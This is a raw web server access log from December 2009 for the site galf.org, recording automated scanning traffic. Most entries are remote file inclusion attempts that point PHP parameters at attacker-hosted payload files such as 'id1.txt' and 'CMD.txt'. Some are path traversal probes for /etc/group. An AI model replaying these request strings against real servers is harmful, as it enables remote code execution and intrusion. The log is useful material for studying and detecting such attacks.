196.40.83.71 - - [21/Dec/2009:00:03:06 -0800] "GET /logs/access_090921.log//errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:44 -0800] "GET //modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:44 -0800] "GET /logs///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:44 -0800] "GET /logs/access_090914.log%20%20///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:44 -0800] "GET /logs/access_090803.log%20%20///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:45 -0800] "GET //modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:45 -0800] "GET /logs///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:45 -0800] "GET /logs/access_090914.log%20%20///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:45 -0800] "GET /logs/access_090803.log%20%20///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [21/Dec/2009:00:03:50 -0800] "GET /logs/access_091012.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:59 -0800] "GET /logs/access_090914.log%20%20///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:59 -0800] "GET //modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:59 -0800] "GET /logs///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:03:59 -0800] "GET /logs/access_090803.log%20%20///modules/My_eGallery/index.php?basepath=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [21/Dec/2009:00:04:21 -0800] "GET /xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [21/Dec/2009:00:04:21 -0800] "GET /logs/access_090713.log%20%20/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [21/Dec/2009:00:04:21 -0800] "GET /logs/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [21/Dec/2009:00:04:21 -0800] "GET /logs/access_091109.log%20%20/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:05:10 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
61.47.7.71 - - [21/Dec/2009:00:05:10 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
61.47.7.71 - - [21/Dec/2009:00:05:10 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
196.40.83.71 - - [21/Dec/2009:00:05:16 -0800] "GET /logs/access_091012.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:00:05:17 -0800] "GET /errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:00:05:19 -0800] "GET /logs/access_091012.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:00:05:48 -0800] "GET /logs/access_090706.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:00:05:52 -0800] "GET /logs/access_090706.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:06:01 -0800] "GET /logs/access.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "galf.org"
99.198.97.170 - - [21/Dec/2009:00:06:09 -0800] "GET /logs/access_090706.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:06:41 -0800] "GET /logs/access_090706.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:06:41 -0800] "GET /logs/access.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "galf.org"
196.40.83.71 - - [21/Dec/2009:00:06:47 -0800] "GET /logs/access_091012.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:06:47 -0800] "GET /logs/access_090706.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:00:06:48 -0800] "GET /logs/access_091012.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:00:07:08 -0800] "GET /logs/access_091012.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:00:07:26 -0800] "GET /logs/access_090706.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:00:07:28 -0800] "GET /logs/access_090706.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:00:07:42 -0800] "GET /logs/access_090706.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:07:48 -0800] "GET /logs/access.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
61.47.7.71 - - [21/Dec/2009:00:07:48 -0800] "GET /logs/access_090706.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:07:48 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:00:07:52 -0800] "GET /logs/access_091012.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [21/Dec/2009:00:08:20 -0800] "GET /logs/access_090706.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:08:22 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:09:29 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
61.47.7.71 - - [21/Dec/2009:00:09:29 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
61.47.7.71 - - [21/Dec/2009:00:09:29 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
81.174.65.34 - - [21/Dec/2009:00:09:46 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [21/Dec/2009:00:09:46 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [21/Dec/2009:00:09:46 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [21/Dec/2009:00:09:46 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.74.143.51 - - [21/Dec/2009:00:10:35 -0800] "GET /logs/access_090706.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.123 - - [21/Dec/2009:00:11:26 -0800] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
85.214.25.101 - - [21/Dec/2009:00:11:30 -0800] "GET /logs/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.25.101 - - [21/Dec/2009:00:11:30 -0800] "GET /xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.25.101 - - [21/Dec/2009:00:11:31 -0800] "GET /logs/access_090713.log%20%20/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.25.101 - - [21/Dec/2009:00:11:33 -0800] "GET /logs/access_091109.log%20%20/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:12:03 -0800] "GET /logs/access.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
61.47.7.71 - - [21/Dec/2009:00:12:03 -0800] "GET /logs/access_090706.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:12:06 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:12:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
69.175.26.26 - - [21/Dec/2009:00:13:09 -0800] "GET /logs//bbs//skin/ggambo7002_board/setup.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [21/Dec/2009:00:13:09 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/setup.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [21/Dec/2009:00:13:09 -0800] "GET /bbs//skin/ggambo7002_board/setup.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:29 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:31 -0800] "GET /?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:33 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:33 -0800] "GET /logs/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:33 -0800] "GET /?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:34 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:36 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:36 -0800] "GET /?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:36 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:38 -0800] "GET /logs/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:39 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:39 -0800] "GET /logs/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:39 -0800] "GET /?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:13:44 -0800] "GET /logs/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
74.63.15.102 - - [21/Dec/2009:00:13:59 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [21/Dec/2009:00:13:59 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [21/Dec/2009:00:13:59 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [21/Dec/2009:00:13:59 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:14:17 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:14:17 -0800] "GET /?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:14:17 -0800] "GET /logs/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:14:20 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:14:20 -0800] "GET /?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:14:20 -0800] "GET /logs/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:14:23 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:14:23 -0800] "GET /?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:14:23 -0800] "GET /logs/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:14:34 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:14:37 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [21/Dec/2009:00:15:01 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/setup.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:15:16 -0800] "GET /?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:15:16 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:15:16 -0800] "GET /logs/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:15:19 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:15:19 -0800] "GET /logs/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:15:19 -0800] "GET /?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:15:28 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:15:30 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:15:30 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:15:30 -0800] "GET //include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:15:30 -0800] "GET /logs/access_090629.log%20%20///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:00:15:30 -0800] "GET /logs/index.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:15:30 -0800] "GET /logs/access.log%20/index.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:15:30 -0800] "GET /index.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
222.231.1.32 - - [21/Dec/2009:00:15:31 -0800] "GET /logs/access_090629.log%20%20///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:15:31 -0800] "GET //include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:15:31 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:15:32 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:15:32 -0800] "GET /logs/access_090629.log%20%20///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:15:32 -0800] "GET //include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:00:15:36 -0800] "GET /logs/view.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:15:36 -0800] "GET /view.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:15:39 -0800] "GET /logs/access.log%20/view.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
174.142.120.149 - - [21/Dec/2009:00:15:44 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:15:44 -0800] "GET /?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [21/Dec/2009:00:15:44 -0800] "GET /logs/?sourcedir=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:16:05 -0800] "GET /logs/access_090713.log%20%20///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:16:07 -0800] "GET /logs/access_090713.log%20%20///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
